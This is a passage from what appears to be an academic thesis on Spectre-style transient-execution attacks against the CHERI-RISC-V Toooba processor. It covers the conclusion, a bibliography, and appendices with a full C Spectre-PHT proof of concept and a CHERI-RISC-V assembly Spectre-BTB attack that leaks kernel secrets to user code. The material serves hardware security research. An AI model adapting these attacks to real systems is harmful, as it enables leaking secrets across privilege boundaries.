poses a large vulnerability as attackers can transiently escalate privilege. I
showed that both subclasses of transient-execution result in a large threat to
code running on Toooba. I believe that both attack classes can be prevented or
mitigated by security mechanisms currently being developed. However, I be-
lieve that further findings have yet to be made about transient-execution attacks
on CHERI-RISC-V microprocessors. I further think that transient-execution
attacks will significantly impact threat models and hardware design of any mi-
croarchitecture in the future, and especially of capability systems, since they
make strong security claims. This work builds the basis for advanced research on
transient-execution attacks on RISC-V microprocessors. Furthermore, it sets
the stage for a first generation of commercial CHERI microprocessors to en-
sure that CHERI’s strong architectural guarantees are also non-bypassable in
speculation.
Bibliography
[1] The MITRE Corporation. CVE-2014-0160. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160. 2013.
[2] Trevor Jim et al. “Cyclone: A Safe Dialect of C”. In: Proceedings of
the General Track of the Annual Conference on USENIX Annual Tech-
nical Conference. ATEC ’02. USA: USENIX Association, June 2002,
pp. 275–288. isbn: 1880446006.
[3] George C. Necula, Scott McPeak, and Westley Weimer. “CCured: Type-
Safe Retrofitting of Legacy Code”. In: Proceedings of the 29th ACM
SIGPLAN-SIGACT Symposium on Principles of Programming Languages.
POPL ’02. Portland, Oregon: Association for Computing Machinery,
Jan. 2002, pp. 128–139.
[4] Archibald Samuel Elliott et al. “Checked C: Making C Safe by Ex-
tension”. In: 2018 IEEE Cybersecurity Development (SecDev). Cam-
bridge, MA, USA, Sept. 2018, pp. 53–60.
[5] Thomas Bourgeat et al. “MI6: Secure Enclaves in a Speculative Out-of-
Order Processor”. In: Proceedings of the 52nd Annual IEEE/ACM In-
ternational Symposium on Microarchitecture. MICRO ’52. Columbus,
OH, USA: Association for Computing Machinery, Oct. 2019, pp. 42–
56.
[6] Marno van der Maas and Simon W. Moore. “Protecting Enclaves from
Intra-Core Side-Channel Attacks through Physical Isolation”. In: Pro-
ceedings of the 2nd Workshop on Cyber-Security Arms Race. CYSARM’20.
Virtual Event, USA: Association for Computing Machinery, Nov. 2020,
pp. 1–12.
[7] Maurice V. Wilkes and Roger M. Needham. The Cambridge CAP Com-
puter and Its Operating System. Elsevier, Jan. 1979.
[8] William B. Ackerman and William W. Plummer. “An implementation
of a multiprocessing computer system”. In: SOSP ’67: Proceedings of
the First ACM Symposium on Operating System Principles. New York,
NY, USA: ACM, 1967, pp. 5.1–5.10.
[9] Dmitry Evtyushkin et al. “BranchScope: A New Side-Channel Attack
on Directional Branch Predictor”. In: Proceedings of the Twenty-Third
International Conference on Architectural Support for Programming
Languages and Operating Systems. ASPLOS ’18. Williamsburg, VA,
USA: Association for Computing Machinery, Mar. 2018, pp. 693–707.
[10] Krste Asanović and David A. Patterson. Instruction Sets Should Be Free:
The Case For RISC-V. Tech. rep. UCB/EECS-2014-146. University of
California at Berkeley, Electrical Engineering and Computer Sciences,
Aug. 2014.
[11] Andrew Waterman and Krste Asanović, eds. The RISC-V Instruction
Set Manual. Volume I: User-Level ISA. Document Version 20191213.
RISC-V Foundation, Dec. 2019.
[12] Andrew Waterman and Krste Asanović, eds. The RISC-V Instruction
Set Manual. Volume II: Privileged Architecture. Document Version
20190608-Priv-MSU-Ratified. RISC-V Foundation, June 2019.
[13] Robert M. Tomasulo. “An Efficient Algorithm for Exploiting Multiple
Arithmetic Units”. In: IBM Journal of Research and Development 11.1
(1967), pp. 25–33.
[14] David A. Patterson and John L. Hennessy. Computer Organization and
Design, RISC-V Edition: The Hardware/Software Interface. 6th. San
Francisco, CA, USA: Morgan Kaufmann Publishers Inc., 2017. isbn:
9780128122754.
[15] John L. Hennessy and David A. Patterson. Computer Architecture: A
Quantitative Approach. 6th. San Francisco, CA, USA: Morgan Kauf-
mann Publishers Inc., 2017. isbn: 9780128119068.
[16] David M. Gallagher et al. “Dynamic Memory Disambiguation Using
the Memory Conflict Buffer”. In: Conference on Architectural Support
for Programming Languages and Operating Systems. San Jose, CA,
USA, Oct. 1994.
[17] Martin Schwarzl et al. Speculative Dereferencing of Registers: Reviving
Foreshadow. Aug. 2020. arXiv: 2008.02307.
[18] Yuval Yarom and Katrina Falkner. “FLUSH+RELOAD: A High Res-
olution, Low Noise, L3 Cache Side-Channel Attack”. In: USENIX Se-
curity Symposium. San Diego, CA: USENIX Association, Aug. 2014,
pp. 719–732.
[19] Claudio Canella et al. “A Systematic Evaluation of Transient Execution
Attacks and Defenses”. In: Proceedings of the 28th USENIX Conference
on Security Symposium. SEC’19. Santa Clara, CA, USA: USENIX As-
sociation, Aug. 2019, pp. 249–266.
[20] Jo Van Bulck et al. “LVI: Hijacking Transient Execution through Mi-
croarchitectural Load Value Injection”. In: 2020 IEEE Symposium on
Security and Privacy (SP). San Francisco, CA, USA, 2020, pp. 54–72.
[21] Robert N. M. Watson et al. Capability Hardware Enhanced RISC In-
structions (CHERI): Notes on the Meltdown and Spectre Attacks. Tech.
rep. UCAM-CL-TR-916. University of Cambridge, Computer Labora-
tory, Feb. 2018. url: https://www.cl.cam.ac.uk/techreports/UCAM-CL-TR-916.pdf.
[22] Paul Kocher et al. “Spectre Attacks: Exploiting Speculative Execution”.
In: IEEE Symposium on Security and Privacy. San Francisco, CA, USA,
May 2019.
[23] Esmaeil Mohammadian Koruyeh et al. “Spectre Returns! Speculation
Attacks Using the Return Stack Buffer”. In: Proceedings of the 12th
USENIX Conference on Offensive Technologies. WOOT’18. Baltimore,
MD, USA: USENIX Association, Aug. 2018.
[24] Giorgi Maisuradze and Christian Rossow. “Ret2spec: Speculative Exe-
cution Using Return Stack Buffers”. In: Proceedings of the 2018 ACM
SIGSAC Conference on Computer and Communications Security. CCS
’18. Toronto, Canada: Association for Computing Machinery, Jan. 2018,
pp. 2109–2122.
[25] Jann Horn. speculative execution, variant 4: speculative store bypass.
https://bugs.chromium.org/p/project-zero/issues/detail?id=1528. Feb. 2018.
[26] Stephan Van Schaik et al. “RIDL: Rogue In-Flight Data Load”. In: IEEE
Symposium on Security and Privacy. San Francisco, CA, USA, May
2019.
[27] Moritz Lipp et al. “Meltdown: Reading Kernel Memory from User Space”.
In: Commun. ACM (May 2020), pp. 46–56.
[28] Jo Van Bulck et al. “Foreshadow: Extracting the Keys to the Intel SGX
Kingdom with Transient Out-of-Order Execution”. In: 27th USENIX
Security Symposium (USENIX Security 18). Baltimore, MD: USENIX
Association, Aug. 2018, pp. 991–1008.
[29] Intel Corporation. Intel® Software Guard Extensions Developer Guide.
https://software.intel.com/content/www/us/en/develop/documentation/sgx-developer-guide/top.html. Sept. 2016.
[30] Intel Corporation. Deep Dive: Intel Analysis of L1 Terminal Fault. Tech.
rep. 2018. url: https://software.intel.com/security-software-guidance/advisory-guidance/l1-terminal-fault.
[31] Ofir Weisse et al. Foreshadow-NG: Breaking the Virtual Memory Ab-
straction with Transient Out-of-Order Execution. Tech. rep. 1.0. Aug.
2018, p. 7. url: https://foreshadowattack.eu/foreshadow-NG.pdf.
[32] Arm Limited. Cache Speculation Side-channels. Tech. rep. 2.5. 2020,
p. 21. url: https://developer.arm.com/support/arm-security-updates/speculative-processor-vulnerability.
[33] Intel Corporation. Intel Analysis of Speculative Execution Side Chan-
nels. Tech. rep. 4.0. 2018, p. 16. url: https://www.intel.com/content/www/us/en/architecture-and-technology/intel-analysis-of-speculative-execution-side-channels-paper.html.
[34] Vladimir Kiriansky and Carl Waldspurger. Speculative Buffer Overflows:
Attacks and Defenses. 2018. arXiv: 1807.03757 [cs.CR].
[35] Dag Arne Osvik, Adi Shamir, and Eran Tromer. “Cache Attacks and
Countermeasures: The Case of AES”. In: Proceedings of the 2006 The
Cryptographers’ Track at the RSA Conference on Topics in Cryptology.
CT-RSA’06. San Jose, CA: Springer-Verlag, 2006, pp. 1–20.
[36] Arm Limited. Arm v8.5-A CPU updates. https://developer.arm.com/support/arm-security-updates/speculative-processor-vulnerability.
Version 1.4. June 2019.
[37] Robert N. M. Watson et al. Capability Hardware Enhanced RISC In-
structions: CHERI Instruction-Set Architecture (Version 8). Tech. rep.
UCAM-CL-TR-951. University of Cambridge, Computer Laboratory,
Oct. 2020. url: https://www.cl.cam.ac.uk/techreports/UCAM-CL-TR-951.pdf.
[38] Jonathan Woodruff et al. “CHERI Concentrate: Practical Compressed
Capabilities”. In: IEEE Transactions on Computers 68.10 (2019), pp. 1455–
1469.
[39] Brooks Davis et al. CheriABI: Enforcing valid pointer provenance and
minimizing pointer privilege in the POSIX C run-time environment.
Tech. rep. UCAM-CL-TR-932. University of Cambridge, Computer Lab-
oratory, Apr. 2019. url: https://www.cl.cam.ac.uk/techreports/UCAM-CL-TR-932.pdf.
[40] Hongyan Xia et al. “CheriRTOS: A Capability Model for Embedded
Devices”. In: 2018 IEEE 36th International Conference on Computer
Design (ICCD). Orlando, FL, USA: IEEE Computer Society, Oct. 2018,
pp. 92–99.
[41] David Kaplan, Jeremy Powell, and Tom Woller. AMD SEV-SNP: Strength-
ening VM Isolation with Integrity Protection and More. Tech. rep. Ad-
vanced Micro Devices Inc., Jan. 2020. url: https://www.amd.com/system/files/TechDocs/SEV-SNP-strengthening-vm-isolation-with-integrity-protection-and-more.pdf.
[42] Abraham Gonzalez et al. “Replicating and Mitigating Spectre Attacks
on an Open-Source RISC-V Microarchitecture”. In: Third Workshop on
Computer Architecture Research with RISC-V. Phoenix, AZ, USA, June
2019.
[43] Christopher Celio, David A. Patterson, and Krste Asanović. The Berke-
ley Out-of-Order Machine (BOOM): An Industry-Competitive, Synthe-
sizable, Parameterized RISC-V Processor. Tech. rep. UCB/EECS-2015-
167. University of California at Berkeley, Electrical Engineering and
Computer Sciences, June 2015.
[44] Anh-Tien Le et al. “Experiment on Replication of Side Channel Attack
via Cache of RISC-V Berkeley Out-of-Order Machine (BOOM) Im-
plemented on FPGA”. In: Fourth Workshop on Computer Architecture
Research with RISC-V (CARRV 2020). Valencia, Spain, May 2020.
[45] Arm Limited. Vulnerability of Speculative Processors to Cache Tim-
ing Side-Channel Mechanism. https://developer.arm.com/
support/arm-security-updates/speculative-processor-
vulnerability. 2020.
[46] Sizhuo Zhang et al. “Composable Building Blocks to Open up Proces-
sor Design”. In: 2018 51st Annual IEEE/ACM International Symposium
on Microarchitecture (MICRO). Fukuoka, Japan, Oct. 2018, pp. 68–81.
[47] Zhen Hang Jiang and Yunsi Fei. “A novel cache bank timing attack”. In:
2017 IEEE/ACM International Conference on Computer-Aided Design
(ICCAD). Irvine, CA, USA, Nov. 2017, pp. 139–146.
[48] Hovav Shacham. “The Geometry of Innocent Flesh on the Bone: Return-
into-Libc without Function Calls (on the X86)”. In: Proceedings of
the 14th ACM Conference on Computer and Communications Security.
CCS ’07. Alexandria, Virginia, USA: Association for Computing Ma-
chinery, 2007, pp. 552–561.
[49] Arm Limited. Arm Architecture Reference Manual Supplement Morello
for A-profile Architecture. DDI0606. Arm Limited. Sept. 2020.
Appendix A
Full C Attack
/*
 * Author: Franz Fuchs
 *
 * Spectre-PHT proof of concept version
 *
 * spec_funct first checks the array bounds
 * and then loads the value at the given
 * index. By training the Pattern History Table
 * with 16 calls to the function with valid indices,
 * we trick Toooba into speculatively executing
 * the load even though the index is out of bounds.
 */
#ifdef __CHERI_PURE_CAPABILITY__
#include "pure_cap.h"
#endif
#define MEM_SIZE 16384
#define MEM_SIZE_DW MEM_SIZE/8
#define STACK_SIZE 2048
#define STACK_SIZE_DW STACK_SIZE/8
#define PROBE_SIZE 2048
#define PROBE_SIZE_DW PROBE_SIZE/8
#define SEC_ARR_SIZE 128
#define SEC_ARR_SIZE_DW SEC_ARR_SIZE/8
#define FLUSH_ARR_SIZE 16384
#define FLUSH_ARR_SIZE_DW FLUSH_ARR_SIZE/8
long int mem[MEM_SIZE_DW];
long int buffer[FLUSH_ARR_SIZE_DW];
long int stack[STACK_SIZE_DW];
long int flush_arr[FLUSH_ARR_SIZE_DW];
// arrays holding secret pointers;
// sec_arr_1 must not be read out of bounds
long int* sec_arr_1[SEC_ARR_SIZE_DW];
long int* sec_arr_2[SEC_ARR_SIZE_DW];
long int size = 16;
int main();
void fill_sec_arr();
void probe();
long int spec_funct(long int index);
void flush();
extern void _init_sp(void);
int main()
{
    // write to the stack so the
    // compiler does not optimise it away
    stack[0] = 0;
    size = 16;
    fill_sec_arr();

    // train the pattern history table of the
    // speculative function
    flush_arr[0x0] = spec_funct(0x0);
    flush_arr[0x1] = spec_funct(0x1);
    flush_arr[0x2] = spec_funct(0x2);
    flush_arr[0x3] = spec_funct(0x3);
    flush_arr[0x4] = spec_funct(0x4);
    flush_arr[0x5] = spec_funct(0x5);
    flush_arr[0x6] = spec_funct(0x6);
    flush_arr[0x7] = spec_funct(0x7);
    flush_arr[0x8] = spec_funct(0x8);
    flush_arr[0x9] = spec_funct(0x9);
    flush_arr[0xa] = spec_funct(0xa);
    flush_arr[0xb] = spec_funct(0xb);
    flush_arr[0xc] = spec_funct(0xc);
    flush_arr[0xd] = spec_funct(0xd);
    flush_arr[0xe] = spec_funct(0xe);
    flush_arr[0xf] = spec_funct(0xf);

    // flush the cache to evict the line
    // containing the `size` variable
    flush();

    // store an index pointer at mem
    // and keep its line cached
    sec_arr_2[8] = &(mem[0x40]);

    // ensure that all previous
    // loads and stores have finished
    asm volatile("fence rw, rw");

    // call the speculative function with
    // an out-of-bounds argument
    flush_arr[0x20] = spec_funct(24);

    // probe the memory
    probe();
}
void fill_sec_arr()
{
    for(int i = 0; i < size; i++)
    {
        sec_arr_1[i] = &(mem[0]);
    }
}
void probe()
{
    long int dest;
    for(int i = 0; i < FLUSH_ARR_SIZE_DW; i = i + 8)
    {
        dest = mem[i];
        mem[i] = dest + 1;
    }
}
long int spec_funct(long int index)
{
    long int dest = index;
    if(index < size)
    {
        long int* mem_index = sec_arr_1[index];
        dest = *mem_index;
    }
    return dest;
}
void flush()
{
    long int dest;
    for(int i = 0; i < FLUSH_ARR_SIZE_DW; i = i + 8)
    {
        dest = flush_arr[i];
        flush_arr[i] = dest + 1;
    }
}
In this appendix, I explain how I conducted a Spectre-PHT attack written in
C. However, I do not explain the specific Spectre-PHT vulnerability as I have
already done so in Chapters 4 and 5. I chose a setup similar to the original
Spectre-PHT attack demonstrated in [22]. Parts of the preparation code, e.g.,
register initialisation, are not shown in the code above. The attack setup is as follows.
The function spec_funct accesses the array sec_arr_1 and returns the
value stored at the secret memory pointer if the parameter value index is less
than size. I chose size to be 16 in this example. There exists another array
sec_arr_2, which holds secret memory pointers as well. It is the goal of the
attacker to reveal one or more secret memory addresses from sec_arr_2 in
this attack.
The arrays sec_arr_1 and sec_arr_2 are placed adjacently in mem-
ory by the compiler. The attacker wants to use a greater index than allowed in
order to read from sec_arr_2 instead of sec_arr_1. The code in main
serves three purposes: it prepares the attack, conducts it, and eventually reveals
the sought memory address by probing. In the preparation phase, I fill
the array sec_arr_1 with meaningful pointer values and call the function
spec_funct with values in the range [0, . . . ,0xf] for the index parameter.
Next, I flush the memory in order to evict the cache line that
holds the value of the size variable. The flush function evicts cache lines by
loading data that is not currently present in the cache.
Flushing introduces the delay necessary for the actual Spectre-PHT attack
later. After flushing, I also set up the array sec_arr_2 for the attack by storing
a meaningful value. This brings the corresponding cache lines into the cache as well,
which makes the attacker faster. The last step before the attack is to introduce a
memory fence, which prevents the processor from speculating too far ahead. Speculating
too far would cause uninitialised data to be used in speculation, which would lead to cache
misses and therefore negatively impact the entire attack. In general,
the attacker wants to use every cycle of the mis-speculated control flow as
effectively as possible and therefore wants to avoid unnecessary cache
misses. After that, the actual attack is conducted as described in Chapters 4
and 5. Last, I use the probing mechanism described in Section 3.3.2, which
reveals the sought value.
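The probing step can be sketched as follows. The actual mechanism of Section 3.3.2 times each memory access (e.g., via the cycle counter on RISC-V); the sketch below is a simplified illustration that assumes those per-access latencies have already been collected into a hypothetical latency array, and shows only the decision step that identifies the one cache line made hot by the transient load.

```c
#include <stddef.h>

/* Sketch of the probe's decision step. Assumption: the latencies
 * were measured around each load (on Toooba, e.g., with rdcycle);
 * here they are taken as input so the selection logic can be
 * shown portably.
 *
 * Returns the index of the fastest access, i.e., the line cached
 * by the transient load, or -1 if no access is below the
 * hit/miss threshold. */
static int probe_hot_index(const unsigned long *latency, size_t n,
                           unsigned long threshold)
{
    int hot = -1;
    unsigned long best = threshold;
    for (size_t i = 0; i < n; i++) {
        /* a cache hit is markedly faster than a miss */
        if (latency[i] < best) {
            best = latency[i];
            hot = (int)i;
        }
    }
    return hot;
}
```

The threshold separating hits from misses must be calibrated per platform, as it depends on the cache hierarchy and memory latency of the target.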
Appendix B
Full CHERI-RISC-V Attack
.text
/*
 * Kernel-BTB
 * Author: Franz Fuchs
 *
 * The goal of the attack is to speculatively jump from
 * S mode to U mode. This gives an attacker the full
 * register state of the code operating in S mode. In
 * this example, the user code leaks data private to M mode.
 * This attack is similar to the sandbox attack.
 *
 * 1st load: 0x0000000080060000
 * 2nd load: 0x0000000080061000
 */
change_to_cap_mode:
    // set pcc flags such that capability encoding
    // mode is used
    // This is described in the CHERI Specification v7
    cspecialr ct3, pcc
    li t1, 1
    csetflags ct3, ct3, t1
    li t2, 0x80000018
    csetoffset ct3, ct3, t2
    cjr ct3
init_caps:
    /*
     * data capabilities
     */
    // cs1 is a capability to [0x80001000 - 0x80001fff]
    li t2, 0x80001000
    cfromptr cs1, ddc, t2
    li t1, 0x1000
    csetbounds cs1, cs1, t1

    // ct6 is a capability to [0x80002000 - 0x80002fff]
    li t2, 0x80002000
    cfromptr ct6, ddc, t2
    li t1, 0x1000
    csetbounds ct6, ct6, t1

    // store value at 0(ct6)
    li t1, 0x200
    csd t1, 0(ct6)

    /*
     * code capabilities
     */
    // PCC for flush function
    cllc cs4, flush
    li t1, 0x100
    csetbounds cs4, cs4, t1

    // PCC for user code jump
    cllc cs5, user_funct_cont
    li t1, 0x100
    csetbounds cs5, cs5, t1

    // PCC for kernel code jump
    cllc ct1, kernel_funct_cont
    li t2, 0x100
    csetbounds ct1, ct1, t2

    // store at 0(cs1)
    csc ct1, 0(cs1)
init_exceps:
    // enable interrupts for all privilege levels
    // MIE = 1, SIE = 1, UIE = 1
    li t2, 0xb
    csrs mstatus, t2
    // delegate ecalls to S mode
    // ecalls are set with bit 8
    li t2, 256
    csrw medeleg, t2

// changes to S mode
change_to_s_mode:
    // set MPP such that we return to S mode
    li x6, 0x00001000
    csrc mstatus, x6
    li x6, 0x00000800
    csrs mstatus, x6
    // store perform_s_mode_action address in mepcc
    cllc ct0, perform_s_mode_action
    cspecialw mepcc, ct0
    mret
// initialises trap vector
perform_s_mode_action:
    // stvec mode: direct (value 0 as RISC-V instructions
    // are aligned on 2 byte boundaries)
    // stvec base address: kernel_funct
    cllc ct2, kernel_funct
    li t1, 0x10000
    csetbounds ct2, ct2, t1
    cspecialw stcc, ct2
change_to_u_mode:
    // set SPP such that we return to U mode
    li x6, 0x00000100
    csrc sstatus, x6
    // store user_funct address in sepcc
    cllc ct0, user_funct
    li t1, 0x10000
    csetbounds ct0, ct0, t1
    cspecialw sepcc, ct0
    // jump to user code
    sret
flush:
    // flush entire cache
    // use ddc for that
    // set to memory address not used by
    // other sections
    li t2, 0x80010000
    li t3, 0x4000
    add t3, t2, t3
    cfromptr ct1, ddc, t2
flush_loop:
    cld t0, 0(ct1)
    cincoffsetimm ct1, ct1, 64
    cgetaddr t0, ct1
    ble t0, t3, flush_loop
    // fence instruction
    fence rw, rw
    cret
/*
 * kernel code
 *
 * running in S privilege mode
 */
.section .kernel , "ax"
kernel_funct:
    // jump to start function
    // done this way in order to always have the same
    // start address, which makes it easier to
    // alias the right BTB entry
    j kernel_funct_start

.rept 0x40
.byte 0x00
.endr

kernel_funct_start:
    // generate a powerful capability
    li t2, 0x80060000
    li t3, 0x10000
    li t4, 0x1000
    add t3, t2, t3
    cfromptr ct6, ddc, t2
    csd t4, 0(ct6)
    // jump to kernel_funct_cont
    clc ct1, 0(cs1)
    // this jump will be aliased and MUST NOT be
    // moved around. If moved around, the corresponding
    // jump in the user code must be adjusted as well
    cjr ct1

.rept 0x40
.byte 0x00
.endr

kernel_funct_cont:
    // content of ct6 shall not be visible to anyone else
    cmove ct6, cnull
    // idle here
    j kernel_funct_cont
/*
 * user code
 *
 * running in U privilege mode
 */
.section .user , "ax"
user_funct:
    // done this way in order to always have the same
    // start address, which makes it easier to
    // alias the right BTB entry
    j user_funct_start

.rept 0xc52
.byte 0x00
.endr

user_funct_start:
    // flush caches
    cjalr cra, cs4
    // jump to continued code
    // this jump will be used for aliasing and MUST NOT be
    // moved around. If moved around, the corresponding
    // jump in the kernel code must be adjusted as well
    cjr cs5

.rept 0x40
.byte 0x00
.endr

user_funct_cont:
    // load from ct6
    // This is the transient-execution sequence
    // revealing the secret value
    cld t5, 0(ct6)
    cincoffset ct5, ct6, t5
    cld t5, 0(ct5)
    // call kernel_funct
    ecall

// infinite loop
user_funct_loop:
    add t1, x0, x0
    beq t1, x0, user_funct_loop
In this appendix, I explain how I conducted a Spectre-BTB attack written
in CHERI-RISC-V assembly. However, I do not explain the specific Spectre-
BTB vulnerability as I have already done so in Chapters 4 and 5. The code
is separated into preparation code, kernel code, and user code. The goal of the
attack is to leak a kernel-space secret from user space. I will only describe the
preparation code, as the kernel and user space code depicted above closely
resembles the attack described in Section 5.1.3.
The first task is to bring Toooba from integer pointer mode into capability pointer
mode, which is achieved in change_to_cap_mode by setting the corresponding
flag on a code capability and then jumping to it. The next step is to set
up capability registers with the code and data capabilities used during the
demonstration of the attack later. This is done in the code following the init_caps
label. The principle is always the same: first, the almighty capability stored in
ddc is moved to a register and the base address of the new capability is specified;
second, its bounds are narrowed.
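This derive-then-restrict principle can be illustrated with a small C model. The sketch below is a simplified software model for illustration only – it is not the real CHERI capability representation or API (CHERI C code would use compiler builtins instead) – but it captures the key monotonicity property: bounds can only ever be narrowed, never widened.

```c
#include <stdbool.h>
#include <stdint.h>

/* Simplified model of a capability (illustrative only; real CHERI
 * capabilities are compressed 128-bit values with permissions). */
typedef struct {
    uint64_t base;  /* lower bound */
    uint64_t top;   /* upper bound (exclusive) */
    uint64_t addr;  /* current address */
    bool     tag;   /* validity tag */
} cap_model;

/* Models cfromptr: derive a capability pointing at addr from an
 * authorising capability (e.g., ddc), inheriting its bounds. */
static cap_model cap_from_ptr(cap_model auth, uint64_t addr)
{
    cap_model c = auth;
    c.addr = addr;
    return c;
}

/* Models csetbounds: narrow the bounds to [addr, addr+len).
 * Monotonicity: the requested region must lie within the existing
 * bounds; otherwise the tag is cleared, making the capability
 * unusable. */
static cap_model cap_set_bounds(cap_model c, uint64_t len)
{
    if (c.addr < c.base || c.addr + len > c.top) {
        c.tag = false;          /* attempted widening: invalidate */
    } else {
        c.base = c.addr;
        c.top  = c.addr + len;
    }
    return c;
}
```

Deriving cs1 as in init_caps would then read, in this model, as deriving from an all-memory ddc at address 0x80001000 and narrowing to a 0x1000-byte region; a later attempt to re-derive wider bounds from cs1 clears the tag.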
The largest part of the preparation code sets up Toooba such that the
kernel code runs in S privilege mode and the user code runs in U privilege
mode. The kernel code will be called during exception handling, which requires
enabling exceptions (done in init_exceps) and setting up
exception vectors. A pointer to the function kernel_funct is stored in
stcc – the capability-extended register for the exception vector base address
register in S privilege mode – setting up exception handling. Finally, the code
changes privilege mode to U mode and jumps to the function user_funct
– the beginning of the user code.
The two instructions in the function user_funct_start constitute the
last part of the preparation code. The first instruction is a call to the flush
function defined earlier in the code. This ensures that a load in the kernel
code will miss all caches, enabling the attack by making Toooba mis-speculate
for a longer time. The second instruction is a jump to the label
user_funct_cont. This jump instruction trains the BTB as described in
Chapter 5. The ecall instruction is an environment call, which is handled
by the kernel code and effectively starts the attack. A probing function is
not shown in the attack example above. At multiple places in the code, I use
assembler macros that insert zero bytes or no-operations (nop). These align
instructions in memory such that the BTB aliasing approach works.
The .section statements have the same task, but on a coarser scale.
TRITA-EECS-EX-2021:61
www.kth.se